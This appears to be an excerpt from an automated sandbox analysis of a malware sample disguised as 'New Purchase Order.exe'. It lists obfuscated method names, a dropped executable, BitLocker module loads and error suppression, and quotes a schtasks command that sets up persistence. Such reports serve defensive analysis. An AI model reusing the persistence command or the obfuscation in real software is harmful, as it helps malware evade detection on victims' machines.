            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pZ8VsZpbIyXWRi4xmL.csHigh entropy of concatenated method names: 'He9Lg9bYPa', 'm4ZL485f5n', 'IsYLQLoame', 'K74Lp7hIfs', 'cPhLfTBhhh', 'ONKLrMjGPE', 'rakL6TSBKq', 'wpeLNGduWv', 'mjmL7UhW3l', 'qPrLOdW5Cf'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, AmpewrzqopynfUd9IQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jVd7WiWO7U', 'tuY7fCut2Z', 'uIx7rJ2gS0', 'LBb76VrIRQ', 'ESI7NmM5Cv', 'KLF77My1SR', 'QHt7OLNVjP'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, yjihqph90VT05xOHal.csHigh entropy of concatenated method names: 'erjRGcWlvm', 'cjdRjXBCPp', 'E5URK8qXfe', 'pMxRPtDeO5', 'g2wRUtkgJc', 'W9EKCKdXt7', 'wAvKHIP7sU', 'mw9KqdUjNN', 'mpQKaNCOrj', 'iThKF5pyTs'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, HZy5SBkh2W02yWXDLN.csHigh entropy of concatenated method names: 'j8aWQyWCMB', 'dENWpXGZ9S', 'dcpWhnNMVf', 'w7UWAyZn1b', 'zI8WuRDZ98', 'Kj3W3I0XWr', 'NjnWSaX2a8', 'oVXWbHkqcH', 'Tg5W12lBsX', 'u0pW8mEYXY'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, FIWHVHS5suerTBVvIO.csHigh entropy of concatenated method names: 'FZnPVII5V8', 'ep0PLpYuvU', 'xV5PRZXDk4', 'J1YRXgvArg', 'cMGRzDXvor', 'JeTPiKZUVY', 'xe8PdpIJZS', 'tDMPwnpX4w', 'JVjP2bKIwP', 'kJJPn9Mr3S'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, epK78uX9OTwa4D0L5y.csHigh entropy of concatenated method names: 'cHK7d26un8', 'Rod72TeVOm', 'OUA7nS2MRf', 'JBk7VJpTtp', 'Md27jHVtu9', 'uDE7KlLWFh', 'tqk7RDevs2', 'PXaNqF1xKg', 'q2nNa0pB2u', 'ssJNFeNfcb'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, XY923XnGuNCejkYu1L.csHigh entropy of concatenated method names: 'jlIdPRGX8w', 'oIDdU9wFOo', 'QbIdtyXWRi', 'BxmdyLkcOh', 'EpOdfdgBji', 'Gqpdr90VT0', 'CjKpF6NacvkSPUdcJD', 'YlwsPfCw2QpANjbu6Y', 'VqFddKqI7a', 'GtMd2g88vF'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, ExRvkTwyDRY3WDaugW.csHigh entropy of concatenated method names: 'xq75SoF65', 'MBpg5fnMH', 'WvJ4S61wx', 'X0uTeSNM3', 'S2Xpk1nbX', 'rRhYCdNE6', 'uybUUEAmlW01ueGk5w', 'Bm0PwbZLyFuyeF6JkJ', 'q1rNHPG1v', 'QO4OHUyKi'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, boMgoaHflWSYD8hTXl.csHigh entropy of concatenated method names: 'Ula6a9WT6R', 'Y1G6XKv1Su', 'cQyNiraIQo', 'BwtNdvXovc', 'NhX68ytdb3', 'wLq6lwmQkM', 'bIH6kRRv0e', 'Vr56ZPWSFh', 'bLS69gP3cj', 'YJx6myARiJ'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, zIShGKFVU7XNWg2Mgi.csHigh entropy of concatenated method names: 'xQGNhrBfPJ', 'scINAcq2ZT', 't4mN02s7GY', 'uLnNu8rW1C', 'uBVNZs3aVb', 'GxbN33i05B', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, wRGX8wQWID9wFOoes1.csHigh entropy of concatenated method names: 'sukjZQQ0Mk', 'Yjuj9EgEqu', 'W6vjmknPmy', 'EIYjDv4ABC', 'YBgjCQ1Hp7', 'remjH0pyrX', 'DGljqcNLKW', 'uHNja0Wbx5', 'NUujFHkjjS', 'E6NjXNQ6W7'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, SaOS2Yx9nqj2m77EVd.csHigh entropy of concatenated method names: 'wI0PekqJ4x', 'UuvPBeQgBr', 'O0RP5cFRd1', 'RolPgdlDVF', 'EbBPsHSyhp', 'zTmP4HAq7d', 'fKQPTFg3vZ', 'pLXPQuZR77', 'y9HPpb3b83', 'zj4PYFsCeg'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.csHigh entropy of concatenated method names: 'V932Gkqpgh', 'aBl2VLocvS', 'bfg2jfu3J7', 'USq2Lv6wXT', 'VtV2KWy5gF', 'RpS2RGK6qa', 'V7U2Peyj1H', 'tsd2UTeRp5', 'N4K2JossHA', 'Y5w2t1ZsbP'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, d6lgf2jMUmLwVZlh7E.csHigh entropy of concatenated method names: 'Dispose', 'P2idFWPtm6', 'WcpwAab5t1', 'EK5ee3ahRY', 'PPFdX2en7H', 'RWydzRBJ0Q', 'ProcessDialogKey', 'Oc5wiIShGK', 'fU7wdXNWg2', 'wgiwwnpK78'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, Gn1myqd2XhOdEBacnrW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D5yOZFlQdy', 'i7TO9kXKgs', 'u7IOmLZQRu', 'rtpODclqgj', 'eswOCEN6XA', 'm8MOHWUc53', 'EL0OqK09IQ'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, VBLyFcdi5PPNAqTca6G.csHigh entropy of concatenated method names: 'aK57eACnOx', 'aUa7BoZBeH', 'U8A75JmFVm', 'a8o7gIfr6V', 'mO27s4wbTZ', 'QXU74VFrO1', 'Fge7TSKk8y', 'YbZ7QMHTQC', 'rMI7psu1b1', 'cvC7YPpwOM'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, jF2en7aHZWyRBJ0Q8c.csHigh entropy of concatenated method names: 'b73NVtL3tX', 'mo0NjyAv2K', 'AfKNLQ8mpR', 'vIcNKTJjGq', 'XYgNRrPkk8', 'tANNPPFy03', 'D5INUQax0d', 'pKlNJ7EBf2', 'a5mNti2N75', 'lrlNywabal'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pZ8VsZpbIyXWRi4xmL.csHigh entropy of concatenated method names: 'He9Lg9bYPa', 'm4ZL485f5n', 'IsYLQLoame', 'K74Lp7hIfs', 'cPhLfTBhhh', 'ONKLrMjGPE', 'rakL6TSBKq', 'wpeLNGduWv', 'mjmL7UhW3l', 'qPrLOdW5Cf'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, AmpewrzqopynfUd9IQ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jVd7WiWO7U', 'tuY7fCut2Z', 'uIx7rJ2gS0', 'LBb76VrIRQ', 'ESI7NmM5Cv', 'KLF77My1SR', 'QHt7OLNVjP'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, yjihqph90VT05xOHal.csHigh entropy of concatenated method names: 'erjRGcWlvm', 'cjdRjXBCPp', 'E5URK8qXfe', 'pMxRPtDeO5', 'g2wRUtkgJc', 'W9EKCKdXt7', 'wAvKHIP7sU', 'mw9KqdUjNN', 'mpQKaNCOrj', 'iThKF5pyTs'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, HZy5SBkh2W02yWXDLN.csHigh entropy of concatenated method names: 'j8aWQyWCMB', 'dENWpXGZ9S', 'dcpWhnNMVf', 'w7UWAyZn1b', 'zI8WuRDZ98', 'Kj3W3I0XWr', 'NjnWSaX2a8', 'oVXWbHkqcH', 'Tg5W12lBsX', 'u0pW8mEYXY'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, FIWHVHS5suerTBVvIO.csHigh entropy of concatenated method names: 'FZnPVII5V8', 'ep0PLpYuvU', 'xV5PRZXDk4', 'J1YRXgvArg', 'cMGRzDXvor', 'JeTPiKZUVY', 'xe8PdpIJZS', 'tDMPwnpX4w', 'JVjP2bKIwP', 'kJJPn9Mr3S'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, epK78uX9OTwa4D0L5y.csHigh entropy of concatenated method names: 'cHK7d26un8', 'Rod72TeVOm', 'OUA7nS2MRf', 'JBk7VJpTtp', 'Md27jHVtu9', 'uDE7KlLWFh', 'tqk7RDevs2', 'PXaNqF1xKg', 'q2nNa0pB2u', 'ssJNFeNfcb'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, XY923XnGuNCejkYu1L.csHigh entropy of concatenated method names: 'jlIdPRGX8w', 'oIDdU9wFOo', 'QbIdtyXWRi', 'BxmdyLkcOh', 'EpOdfdgBji', 'Gqpdr90VT0', 'CjKpF6NacvkSPUdcJD', 'YlwsPfCw2QpANjbu6Y', 'VqFddKqI7a', 'GtMd2g88vF'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, ExRvkTwyDRY3WDaugW.csHigh entropy of concatenated method names: 'xq75SoF65', 'MBpg5fnMH', 'WvJ4S61wx', 'X0uTeSNM3', 'S2Xpk1nbX', 'rRhYCdNE6', 'uybUUEAmlW01ueGk5w', 'Bm0PwbZLyFuyeF6JkJ', 'q1rNHPG1v', 'QO4OHUyKi'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, boMgoaHflWSYD8hTXl.csHigh entropy of concatenated method names: 'Ula6a9WT6R', 'Y1G6XKv1Su', 'cQyNiraIQo', 'BwtNdvXovc', 'NhX68ytdb3', 'wLq6lwmQkM', 'bIH6kRRv0e', 'Vr56ZPWSFh', 'bLS69gP3cj', 'YJx6myARiJ'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, zIShGKFVU7XNWg2Mgi.csHigh entropy of concatenated method names: 'xQGNhrBfPJ', 'scINAcq2ZT', 't4mN02s7GY', 'uLnNu8rW1C', 'uBVNZs3aVb', 'GxbN33i05B', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, wRGX8wQWID9wFOoes1.csHigh entropy of concatenated method names: 'sukjZQQ0Mk', 'Yjuj9EgEqu', 'W6vjmknPmy', 'EIYjDv4ABC', 'YBgjCQ1Hp7', 'remjH0pyrX', 'DGljqcNLKW', 'uHNja0Wbx5', 'NUujFHkjjS', 'E6NjXNQ6W7'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, SaOS2Yx9nqj2m77EVd.csHigh entropy of concatenated method names: 'wI0PekqJ4x', 'UuvPBeQgBr', 'O0RP5cFRd1', 'RolPgdlDVF', 'EbBPsHSyhp', 'zTmP4HAq7d', 'fKQPTFg3vZ', 'pLXPQuZR77', 'y9HPpb3b83', 'zj4PYFsCeg'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.csHigh entropy of concatenated method names: 'V932Gkqpgh', 'aBl2VLocvS', 'bfg2jfu3J7', 'USq2Lv6wXT', 'VtV2KWy5gF', 'RpS2RGK6qa', 'V7U2Peyj1H', 'tsd2UTeRp5', 'N4K2JossHA', 'Y5w2t1ZsbP'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, d6lgf2jMUmLwVZlh7E.csHigh entropy of concatenated method names: 'Dispose', 'P2idFWPtm6', 'WcpwAab5t1', 'EK5ee3ahRY', 'PPFdX2en7H', 'RWydzRBJ0Q', 'ProcessDialogKey', 'Oc5wiIShGK', 'fU7wdXNWg2', 'wgiwwnpK78'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, Gn1myqd2XhOdEBacnrW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D5yOZFlQdy', 'i7TO9kXKgs', 'u7IOmLZQRu', 'rtpODclqgj', 'eswOCEN6XA', 'm8MOHWUc53', 'EL0OqK09IQ'
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, VBLyFcdi5PPNAqTca6G.csHigh entropy of concatenated method names: 'aK57eACnOx', 'aUa7BoZBeH', 'U8A75JmFVm', 'a8o7gIfr6V', 'mO27s4wbTZ', 'QXU74VFrO1', 'Fge7TSKk8y', 'YbZ7QMHTQC', 'rMI7psu1b1', 'cvC7YPpwOM'
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\ibDqDkseW.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
